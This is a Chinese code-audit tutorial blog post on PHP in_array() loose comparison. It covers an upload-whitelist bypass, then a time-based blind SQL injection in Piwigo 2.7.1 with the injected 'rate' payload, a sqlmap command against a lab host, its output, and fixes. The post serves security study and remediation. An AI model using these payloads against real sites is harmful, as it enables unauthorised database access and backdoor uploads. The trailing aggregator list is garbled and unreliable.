2. 程式人生 > >代碼審計學習01-in_array() 函數缺陷

代碼審計學習01-in_array() 函數缺陷

阿新 發佈:2018-10-22
direct sql 語句 roo lis _id send ret .com www

一、開始代碼審計之旅 01

從今天起,學習代碼審計了,這篇文章就叫代碼審計01吧,題目來自 PHP SECURITY CALENDAR 2017 的第一題,結合 紅日安全 寫的文章,開始吧。

二、先看這道題目

1、題目名稱:Wish List

技術分享圖片

2、in_array() 函數的作用

技術分享圖片

in_array() 函數的作用是判斷第一參數是否存在第二個參數中,存在返回 true,不存在返回 false。需要註意的是,如果函數第三個參數為 true,則第一個參數必須還要和第二個參數同類型,函數才能返回 true。不寫第三個參數,在一些情況下函數會發生強制轉換,題目的漏洞就出在這裏。

3、題目漏洞解析

if (in_array($this->file[‘name‘], $this->whitelist)) {
    move_uploaded_file($this->file[‘tmp_name‘], self::UPLOAD_DIRECTORY . $this->file[‘name‘]);
}

in_array() 函數並只簡單判斷文件名是否存在白名單中,並沒有將第三個參數設置為 true,攻擊者可以上傳一個 5backdoor.php 的文件,其文件名為 5backdoor,in_array() 函數將文件名強制轉換為 5 ,符合 ranger(1,24) 的白名單條件,5backdoor.php 可以上傳,於是一個任意文件上傳漏洞就產生了。

4、in_array() 的擴展知識

in_array 的一段代碼,可以明確看到非嚴格模式與嚴格模式下的區別:

<?php
$array = array(
    ‘egg‘ => true,
    ‘cheese‘ => false,
    ‘hair‘ => 765,
    ‘goblins‘ => null,
    ‘ogres‘ => ‘no ogres allowed in this array‘
);

// Loose checking -- return values are in comments
// First three make sense, last four do not
var_dump(in_array(null, $array)); // true
var_dump(in_array(false, $array)); // true
var_dump(in_array(765, $array)); // true
var_dump(in_array(763, $array)); // true
var_dump(in_array(‘egg‘, $array)); // true
var_dump(in_array(‘hhh‘, $array)); // true
var_dump(in_array(array(), $array)); // true

// Strict checking
var_dump(in_array(null, $array, true)); // true
var_dump(in_array(false, $array, true)); // true
var_dump(in_array(765, $array, true)); // true
var_dump(in_array(763, $array, true)); // false
var_dump(in_array(‘egg‘, $array, true)); // false
var_dump(in_array(‘hhh‘, $array, true)); // false
var_dump(in_array(array(), $array, true)); // false

?>

三、結合一個案例

選取 piwigo2.7.1 內容管理系統的一個 SQL 註入漏洞來分析

1、漏洞原理分析

漏洞涉及文件:include/functions_rate.inc.phpinclude/config_default.inc.php,以及根目錄下的picture.php

picture.php 關鍵代碼:

if (isset($_GET[‘action‘]))
{
  switch ($_GET[‘action‘])
/*****************中間省略*********************/  
     case ‘rate‘ :
    {
      include_once(PHPWG_ROOT_PATH.‘include/functions_rate.inc.php‘);
      rate_picture($page[‘image_id‘], $_POST[‘rate‘]);
      redirect($url_self);
    }
/*****************中間省略*********************/    
}

include/functions_rate.inc.php 關鍵代碼

function rate_picture($image_id, $rate)
{
  global $conf, $user;

  if (!isset($rate)
      or !$conf[‘rate‘]
      or !in_array($rate, $conf[‘rate_items‘]))
  {
    return false;
  }
/*****************中間省略*********************/   
  if ($user_anonymous)
  {
    $query.= ‘ AND anonymous_id = \‘‘.$anonymous_id.‘\‘‘;
  }
  pwg_query($query);
  $query = ‘
INSERT
  INTO ‘.RATE_TABLE.‘
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  (‘
    .$user[‘id‘].‘,‘
    .‘\‘‘.$anonymous_id.‘\‘,‘
    .$image_id.‘,‘
    .$rate
    .‘,NOW())
;‘;
  pwg_query($query);

  return update_rating_score($image_id);
}

include/config_default.inc.php 關鍵代碼

$conf[‘rate_items‘] = array(0,1,2,3,4,5);

通過上述代碼分析,當參數 action=rate時會調用 include/functions_rate.inc.phprate_picture($image_id, $rate) 函數,由於函數中的 in_array($rate, $conf[‘rate_items‘])) 沒有將第三個參數設置因為 true,檢查不嚴格,導致變量 $rate 變量可控,將 $rate 設置為 1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));# 那麽 SQL 語句就會變成:

INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) 
VALUES (2,‘192.168.2‘,1,1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#,NOW()) ;

基於時間的 SQL 盲註就產生了。

2、漏洞證明

用 SQL 註入工具 sqlmap 證明漏洞,payload 如下:

python2 sqlmap.py -u "http://192.168.203.131/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs --batch

漏洞驗證返回結果:

[20:45:34] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to ‘http://192.168.203.131:80/piwigo/picture.php?/1/category/1‘. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rate (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: rate=1 AND SLEEP(5)
---
[20:45:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:45:37] [INFO] fetching database names
[20:45:37] [INFO] fetching number of databases
[20:45:37] [INFO] resumed: 5
[20:45:37] [INFO] resumed: information_schema
[20:45:37] [INFO] resumed: mysq
[20:45:37] [INFO] resumed: mysql
[20:45:37] [INFO] resumed: performance_schema
[20:45:37] [INFO] resumed: piwigo271
available databases [5]:
[*] information_schema
[*] mysq
[*] mysql
[*] performance_schema
[*] piwigo271

3、修復建議

方法1:將 in_array() 函數的第三個參數設置為 true;

方法2:使用 intval() 函數將變量將轉為數字;

方法3:使用正則表達式過濾,只限制為數字(官方修改是用這種方法)。

四、學習一道同類型的 CTF 題目

五、個人收獲

六、參考文章

代碼審計學習01-in_array() 函數缺陷

相關推薦

審計學習01-in_array() 缺陷

direct sql 語句 roo lis _id send ret .com www 一、開始代碼審計之旅 01 從今天起,學習代碼審計了,這篇文章就叫代碼審計01吧,題目來自 PHP SECURITY CALENDAR 2017 的第一題,結合 紅日安全 寫的文章,開始

歐拉知識點總結及模板及歐拉

算法實現 for 表示 滿足 情況 += radi 分析 因子 歐拉函數是少於或等於n的數中與n互質的數的數目。 歐拉函數的性質:它在整數n上的值等於對n進行素因子分解後,所有的素數冪上的歐拉函數之積。 歐拉函數的值  通式:φ(x)=x(

程式碼審計學習01-in_array() 函式缺陷

一、開始程式碼審計之旅 01 從今天起,學習程式碼審計了,這篇文章就叫程式碼審計01吧,題目來自 PHP SECURITY CALENDAR 2017 的第一題,結合 紅日安全 寫的文章,開始吧。 二、先看這道題目 1、題目名稱:Wish List 2、in_array() 函式的作用 in

使用VBA實現簡單自定義(1)

分享圖片 excel表格 style 實現 圖片 ima 我們 text inf 自定義函數VBA代碼1 有一份數據如下,要添加季度信息,我們用VBA實現自定義季度函數: 打開VBE編輯器,插入一個函數 代碼如下: 此時返回excel表格出現了我們自定義的函數如下:

PHP審計學習

打補丁 keyword 辦公 div 搬運 架構 admin clu www. 原文:http://paper.tuisec.win/detail/1fa2683bd1ca79c 作者:June 這是一次分享準備。自己還沒有總結這個的能力,這次就當個搬運工好

[php審計] Window api FindFirstFile 在php中的問題

img -1 http api 問題 文件 span file 多個 include文件夾中文件: 內容: <?php echo __FILE__; ?> index.php: 演示如下: “<<”替換多個任意字符:

審計_md5()

targe 處理 ctf 計算 () bubuko href 比較運算符 打開 題目鏈接:https://ctf.bugku.com/challenges 題解: 打開題目 其PHP代碼如下: 代碼相關知識點鏈接如下: error_reporting() 函數:ht

收藏系列--mysql創建據庫、據表、、存儲過程命令

中文 channel add blog tab efault 文字編碼 mysq -a 創建mysql數據庫 CREATE DATABASE IF NOT EXISTS `database_name` DEFAULT CHARSET utf8 COLLATE utf8_g

審計_組返回NULL繞過

ref 繞過 lse alt .net 個數 字符集 類型 多次 題目鏈接:https://ctf.bugku.com/challenges 題解: 打開題目 其PHP代碼如下: 代碼相關知識點鏈接如下: isset函數:http://php.net/manual/

SAS學習筆記之應用

不能 oracle 理解 資料 oracl 函數應用 特殊 put acl 今天在做數據需求的時候遇到一些問題,因為不能夠在數據庫裏面做,僅僅好在SAS裏面實現。這就遇到了一些麻煩,須要使用一些函數實現部分功能,如查找字段中某個特殊字符出現的次數,查找某個字符的位置等,

據庫學習筆記_10_依賴詳解——依賴公理及其推得規律和屬性閉包

一個 說明 tro ans while 比較 接下來 子集 and 首先引入armstrong‘s axioms, 反射律(reflexivity rule)對於任何為LA(a)子集的LA(b)來說,LA(a)->LA(b)恒成立 增加律(argu

審計】XDCMS 報錯註入

信息 輸入 alt 變量 出現 img 語句 limit lec   審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲 --------------------------------------------

審計】VAuditDemo 重裝漏洞

demo http ima 重裝 config 退出 網站安全 執行 知識 一、源碼安裝漏洞介紹   一般在PHP源碼程序都有一個初始安裝的功能,如果相關代碼沒有對參數進行嚴格過濾,可能會導致攻擊者訪問安裝頁面(install.php)或構造數據包,對網站進行重新安裝,從而

審計】VAuditDemo 文件包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

審計】VAuditDemo 後臺登錄功能驗證繞過

-1 php 審計 use 存在 功能 post nbsp logs 在 admin/logCheck.php中 $_POST[‘user‘]和$_POST[‘pass‘] 未經過任何過濾或者編碼處理就傳入到$query中,可能存在萬能密碼繞過機制 但是$pass經過了加

Python2爬蟲之獲取金融品種行情

python 爬蟲 #!/usr/bin/env python # -*- coding: utf-8 -*- import requests #使用requests包方便 import json #導入json模塊 import time #導入時間模塊 # 以下是某個新聞網站的行情api,返回js

[PHP源閱讀]explode和implode

eof long pla shu sda ssa sax and php C%2B%2B%E6%B7%B7%E5%90%88%E7%BC%96%E7%A8%8B%E4%B9%8Bidlcpp%E6%95%99%E7%A8%8BLua%E7%AF%878 ???κ?c2ta

Scala 學習筆記之(1)

操作 函數賦值 array 筆記 val 類型 code function cnblogs 1 class Student { 2 3 val mySayHello1: String => Unit = sayHello 4 val mySayHe

node學習--回調

function 內容 異步 ava 執行 新建 請求 pan 輸出 node是一個平臺,既不是語言,也不是javascript的庫,只是node的運行環境選擇了javascript語言。node是異步、非阻塞、單線程、錯誤優先的。 新建一個text.txt

最近項目中管理學習

ack 效率 使用 普通 代碼管理 otf 今天 com 建立 之前項目用的都是SVN進行代碼管理的,最新的兩個項目開始用git了。非常早之前就開始接觸git。可是一直沒有正規的使用過,所以對git的命令並非非常熟悉,基本上的命令都是使用諸如clone、c